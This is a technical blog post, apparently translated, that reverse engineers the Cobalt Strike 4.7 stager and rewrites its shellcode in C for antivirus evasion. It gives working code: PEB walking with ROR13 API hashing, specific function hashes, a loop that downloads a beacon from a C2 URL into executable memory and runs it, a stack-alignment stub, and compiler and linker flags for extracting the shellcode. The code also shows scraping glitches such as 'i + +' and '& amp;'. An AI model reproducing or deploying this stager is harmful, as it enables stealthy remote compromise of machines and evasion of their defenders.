CS 4.7 Stager reverse engineering and shellcode rewriting

1. Overview

I have always wanted to have my own controller, but my strength does not allow it. CS is still the best controller on the market, but it is also closely watched by major manufacturers. The effect of avoiding killing through the loader is limited. Later I saw that I have seen someone rewrite the CS beacon using go. I feel that this idea is very good, but there are many problems in go compilation, and there are many limitations in loading, so I thought about whether I could rewrite it in C, but the beacon There are many functions, and it is a bit laborious to rewrite them in a short time, so I want to rewrite the stager part of CS first and convert it into shellcode for loading through the loader. CS 4.7 has been out for a while. This article attempts to reverse engineer the stager of CS and try to rewrite the shellcode of the stager in C.

2. Sample information

Sample name: artifact.exe (64-bit exe generated through CS’s Windows Stager Payload)

3. Stager Reverse

The stager in exe format generated by CS is essentially a shellcode loader. It is the shellcode part that truly realizes the beacon pulling function of the stager, because we can implement the loader in many ways, and the stager loading process in version 4.7 does not There are major changes, so we only do a simple analysis of the loading part of the stager.

3.1 Shellcode loading part:

Enter the main function and directly enter the sub_4017F8 function to see its function implementation:

Enter the sub_4017F8 function, first obtain the system timestamp, then create a thread to read the shellcode through the pipe and execute:

Spliced pipe name: \.\pipe\MSSE-3410-server:

Follow up on the thread execution function in CreateThread:

Following up on WriteShellcodeToPipe_401630, create the pipe and write the shellcode in a loop:

The shellcode content is as follows:

Write shellcode:

Follow up with the ShellcodeExec_4017A6 function, which receives shellcode from the pipe and decrypts it for execution:

Read shellcode from pipe into memory:

Decrypt and execute the read shellcode in the DecryptAndExecShellcode_401595 function:

The decrypted shellcode can be found through the parameters passed to CreateThread, and the starting address is stored in the R9 register:

3.2 Shellcode execution part:

Shellcode is a piece of address-independent code and cannot directly call Win32Api. CS shellcode traverses the PEB structure and PE file export table and finds the required modules and API functions based on the hash value of the exported function:

3.2.1 Traverse PEB to obtain Win32API

Traverse the PEB:

Calculate module hash:

Find exported functions:

The complete compilation of this section is as follows:

| mov rdx,qword ptr gs:[rdx + 60] | Find PEB
| mov rdx,qword ptr ds:[rdx + 18] | Find LDR linked list
| mov rdx,qword ptr ds:[rdx + 20] | Access the InMemoryOrderModuleList linked list
| mov rsi,qword ptr ds:[rdx + 50] | Store the module name in the rsi register
| movzx rcx,word ptr ds:[rdx + 4A] | Store the module name length in the rcx register (unicode)
| xor r9,r9 |
| xor rax,rax |
| lodsb | Read module name character by character
| cmp al,61 | Determine case
| jl A0037 | Jump if upper case
| sub al,20 | If it is lowercase, convert it to uppercase
| ror r9d,D | ROR13 encryption calculation
| add r9d,eax | Store the calculated hash value in the R9 register
| loop A002D | Loop calculation
| push rdx |
| push r9 |
| mov rdx,qword ptr ds:[rdx + 20] | Find the module base address
| mov eax,dword ptr ds:[rdx + 3C] | Find 0x3C offset (PE identification)
| add rax,rdx | rax points to the PE identifier
| cmp word ptr ds:[rax + 18],20B | Determine whether the Magic of the OptionHeader structure is 20B (PE32 + )
| jne A00C7 |
| mov eax,dword ptr ds:[rax + 88] | Assign the export table RVA to the eax register
| test rax,rax |
| je A00C7 |
| add rax,rdx | module base address + export table RVA = export table VA
| push rax |
| mov ecx,dword ptr ds:[rax + 18] | Assign the number of exported functions to the ecx register
| mov r8d,dword ptr ds:[rax + 20] | Assign the starting RVA of the exported function to the R8 register
| add r8,rdx | The starting VA of the exported function
| jrcxz A00C6 |
| dec rcx |
| mov esi,dword ptr ds:[r8 + rcx*4] | Get the RVA of the exported function from back to front
| add rsi,rdx | VA of the currently exported function
| xor r9,r9 |
| xor rax,rax |
| lodsb | Read the exported function name character by character
| ror r9d,D | ROR13 encryption operation
| add r9d,eax | Store the calculated hash in R9
| cmp al,ah | The last digit of the string is 0, at this time al and ah are both 0, and the loop ends
| jne A007D | If not 0, continue operation
| add r9,qword ptr ss:[rsp + 8] | Sum module hash and function hash
| cmp r9d,r10d | Compare the operation result with the function hash (R10) to be found
| jne A006E | If not found, jump back and continue searching.
| pop rax |
Afterwards, the above code will be continuously looped to find the following API functions through hash:

0x0726774C => LoadLibraryA
0xA779563A => InternetOpenA
0xC69F8957 => InternetConnectA
0x3B2E55EB => HttpOpenRequestA
0x7B18062D => HttpSendRequestA
0xE553A458 => VirtualAlloc
0xE2899612 => InternetReadFile
3.2.2 Request the C2 server to establish a connection
Call LoadLibraryA to load wininet.dll:

Call InternetOpenA for initialization:

Call InternetConnectA to establish an http session with the control end:

Call HttpOpenRequestA to create an http request:

Call HttpSendRequestA to send the specified request to the server:

3.2.3 Get Beacon loaded and online
Call VirtualAlloc to allocate memory for beacon:

Call InternetReadFile in a loop to read the beacon into the allocated memory:

Jump to the memory space of beacon:

After that, the beacon will decrypt itself and go online through reflective DLL injection. This is beyond the scope of this article, so I won’t go into details.

4. C rewriting Shellcode

Through the previous content, we have already understood the basic functions of CS stager. The shellcode part initiates an http request to the C2 server and establishes a connection by calling the relevant API function in wininet.dll, remotely reads the content of the beacon and allocates memory for it. Jump execution, in C, we only need to call the same API function to achieve the same function.

However, our purpose is to hope that the code written in C can be converted into shellcode, so that we can not only retain the advantages of flexible loading of shellcode, but also freely control the shellcode by writing C code (assembly experts do not cue). Because the shellcode is a piece of address-independent code, we cannot call the Windows API directly like compiling an executable file. This is why the CS shellcode has a code that traverses the PEB and export tables to obtain the required Windows API functions.

After clarifying the idea, the only thing left is to write the code. The key code is given below.

4.1 Code implementation of Shellcode
4.1.1 Traverse PEB to obtain Win32API
There are already many code examples in this part, just use include:

#include
#include

// This compiles to a ROR instruction
// This is needed because _lrotr() is an external reference
// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
#define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))

// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
typedef struct _MY_PEB_LDR_DATA {
ULONG Length;
BOOLInitialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;

typedef struct _MY_LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;

HMODULE GetProcAddressWithHash( In DWORD dwModuleFunctionHash )
{
PPEB PebAddress;
PMY_PEB_LDR_DATA pLdr;
PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
PVOID pModuleBase;
PIMAGE_NT_HEADERS pNTHeader;
DWORD dwExportDirRVA;
PIMAGE_EXPORT_DIRECTORY pExportDir;
PLIST_ENTRY pNextModule;
DWORD dwNumFunctions;
USHORT usOrdinalTableIndex;
PDWORD pdwFunctionNameBase;
PCSTR pFunctionName;
UNICODE_STRING BaseDllName;
DWORD dwModuleHash;
DWORD dwFunctionHash;
PCSTR pTempChar;
DWORD i;

#if defined(_WIN64)
PebAddress = (PPEB) __readgsqword( 0x60 );
#elif defined(_M_ARM)
// I can assure you that this is not a mistake. The C compiler improperly emits the proper opcodes
// necessary to get the PEB.Ldr address
PebAddress = (PPEB) ( (ULONG_PTR) _MoveFromCoprocessor(15, 0, 13, 0, 2) + 0);
__emit(0x00006B1B);
#else
PebAddress = (PPEB) __readfsdword( 0x30 );
#endif

pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
pNextModule = pLdr->InLoadOrderModuleList.Flink;
pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;

while (pDataTableEntry->DllBase != NULL)
{
dwModuleHash = 0;
pModuleBase = pDataTableEntry->DllBase;
BaseDllName = pDataTableEntry->BaseDllName;
pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;

// Get the next loaded module entry
pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;

// If the current module does not export any functions, move on to the next module.
if (dwExportDirRVA == 0)
{
continue;
}

//Calculate the module hash
for (i = 0; i < BaseDllName.MaximumLength; i + + )
{
pTempChar = ((PCSTR) BaseDllName.Buffer + i);

dwModuleHash = ROTR32( dwModuleHash, 13 );

if ( *pTempChar >= 0x61 )
{
dwModuleHash + = *pTempChar – 0x20;
}
else
{
dwModuleHash + = *pTempChar;
}
}

pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);

dwNumFunctions = pExportDir->NumberOfNames;
pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);

for (i = 0; i < dwNumFunctions; i + + )
{
dwFunctionHash = 0;
pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
pdwFunctionNameBase + + ;

pTempChar = pFunctionName;

do
{
dwFunctionHash = ROTR32( dwFunctionHash, 13 );
dwFunctionHash + =pTempChar;
pTempChar + + ;
} while (
(pTempChar – 1) != 0);

dwFunctionHash + = dwModuleHash;

if (dwFunctionHash == dwModuleFunctionHash)
{
usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
}
}
}

// All modules have been exhausted and the function was not found.
return NULL;
}
After quoting the above code, we also need to define the API functions we need. Here we try to use other APIs for testing:

typedef HMODULE(WINAPI* FN_LoadLibraryA)(
In LPCSTR lpLibFileName
);

typedef LPVOID(WINAPI* FN_VirtualAlloc)(
In_opt LPVOID lpAddress,
In SIZE_T dwSize,
In DWORD flAllocationType,
In DWORD flProtect
);

typedef LPVOID(WINAPI* FN_InternetOpenA)(
In LPCSTR lpszAgent,
In DWORD dwAccessType,
In LPCSTR lpszProxy,
In LPCSTR lpszProxyBypass,
In DWORD dwFlags
);

typedef HANDLE(WINAPI* FN_InternetOpenUrlA)(
In LPVOID hInternet,
In LPCSTR lpszUrl,
In LPCSTR lpszHeaders,
In DWORD dwHeadersLength,
In DWORD dwFlags,
In DWORD_PTR dwContext
);

typedef BOOL(WINAPI* FN_InternetReadFile)(
In LPVOID hFile,
Out LPVOID lpBuffer,
In DWORD dwNumberOfBytesToRead,
Out LPDWORD lpdwNumberOfBytesRead
);

typedef struct tagApiInterface {
FN_LoadLibraryA pfnLoadLibrary;
FN_VirtualAlloc pfnVirtualAlloc;
FN_InternetOpenA pfnInternetOpenA;
FN_InternetOpenUrlA pfnInternetOpenUrlA;
FN_InternetReadFile pfnInternetReadFile;
}APIINTERFACE, *PAPIINTERFACE;
Now that we have the defined function and the GetProcAddressWithHash function, we just need to find the function we need through hash:

#pragma warning( push )
#pragma warning( disable : 4055 )
ai.pfnLoadLibrary = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
ai.pfnLoadLibrary(szWininet);
ai.pfnLoadLibrary(szUser32);

ai.pfnVirtualAlloc = (FN_VirtualAlloc)GetProcAddressWithHash(0xE553A458);
ai.pfnInternetOpenA = (FN_InternetOpenA)GetProcAddressWithHash(0xA779563A);
ai.pfnInternetOpenUrlA = (FN_InternetOpenUrlA)GetProcAddressWithHash(0xF07A8777);
ai.pfnInternetReadFile = (FN_InternetReadFile)GetProcAddressWithHash(0xE2899612);

#pragma warning(pop)
4.1.2 Establish a connection to receive Beacon
LPVOID hInternet = ai.pfnInternetOpenA(0, 0, NULL, 0, NULL);
HANDLE hInternetOpenUrl = ai.pfnInternetOpenUrlA(hInternet, HttpURL, NULL, 0, 0x80000000, 0);
LPVOID addr = ai.pfnVirtualAlloc(0, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

recv_tmp = 1;
recv_tot = 0;
beacon_index = addr;

while (recv_tmp > 0) {
ai.pfnInternetReadFile(hInternetOpenUrl, beacon_index, 8192, (PDWORD) & amp;recv_tmp);
recv_tot + = recv_tmp;
beacon_index + = recv_tmp;
}

((void(*)())addr)();
4.1.3 Code adjustment under 64-bit
To guarantee that our shellcode reaches its entry point with correct stack alignment on 64-bit, we need to write an asm stub that guarantees alignment and use its resulting object file as an additional dependency to the linker:

EXTRNExecutePayload:PROC
PUBLIC AlignRSP ; Marking AlignRSP as PUBLIC allows for the function
; to be called as an extern in our C code.

_TEXT SEGMENT

; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
; to calling the entry point of the payload. This is necessary because 64-bit functions
; in Windows assume that they were called with 16-byte stack alignment. When amd64
; shellcode is executed, you can’t be assured that you stack is 16-byte aligned. For example,
; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
; alignment.

AlignRSP PROC
push rsi ; Preserve RSI since we’re stomping on it
mov rsi, rsp ; Save the value of RSP so it can be restored
and rsp, 0FFFFFFFFFFFFFF0h; Align RSP to 16 bytes
sub rsp, 020h; Allocate homing space for ExecutePayload
call ExecutePayload; Call the entry point of the payload
mov rsp, rsi ; Restore the original value of RSP
pop rsi; Restore RSI
ret; Return to caller
AlignRSPENDP

_TEXT ENDS

END
We also need a header file to help us call the above assembly function:

#if defined(_WIN64)
extern VOID AlignRSP( VOID );

VOID Begin( VOID )
{
// Call the ASM stub that will guarantee 16-byte stack alignment.
// The stub will then call the ExecutePayload.
AlignRSP();
}
#endif
4.1.4 Other pitfalls
(1) When passing in some string parameters, you need to use a character array;

(2) The incoming string cannot be too long. If it is too long, it will be allocated to other sections by the compiler and the extracted shellcode will not be able to find its address;

(3) If CS uses the default profile, note that the URL should meet the CS check requirements (checksum8);

4.2 Modify VSStudio configuration
After writing the code, in order to extract usable shellcode from the exe file we compiled and generated, we also need to modify some configuration options of VS:

translater:

/GS- /TC /GL /W4 /O1 /nologo /Zl /FA /Os

Linker:

/LTCG “x64\Release\AdjustStack.obj” /ENTRY:“Begin” /OPT:REF /SAFESEH:NO

/SUBSYSTEM:CONSOLE /MAP /ORDER:@“function_link_order64.txt” /OPT:ICF /NOLOGO

/NODEFAULTLIB

Among them, AdjustStack.obj is the object file we mentioned above, function_link_order64.txt is the link order we specified, and its content is as follows:

Begin // Entry function
GetProcAddressWithHash
ExecutePayload // shellcode function
4.3 Extract shellcode and go online
After configuring the relevant options, build the project to generate exe, and then extract the .text segment to get our shellcode:

Use a simple loader for testing and it can be successfully launched:

  1. Reference link
    https://bbs.kanxue.com/thread-264470.htm#msg_header_h2_0

https://web.archive.org/web/20210305190309/http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html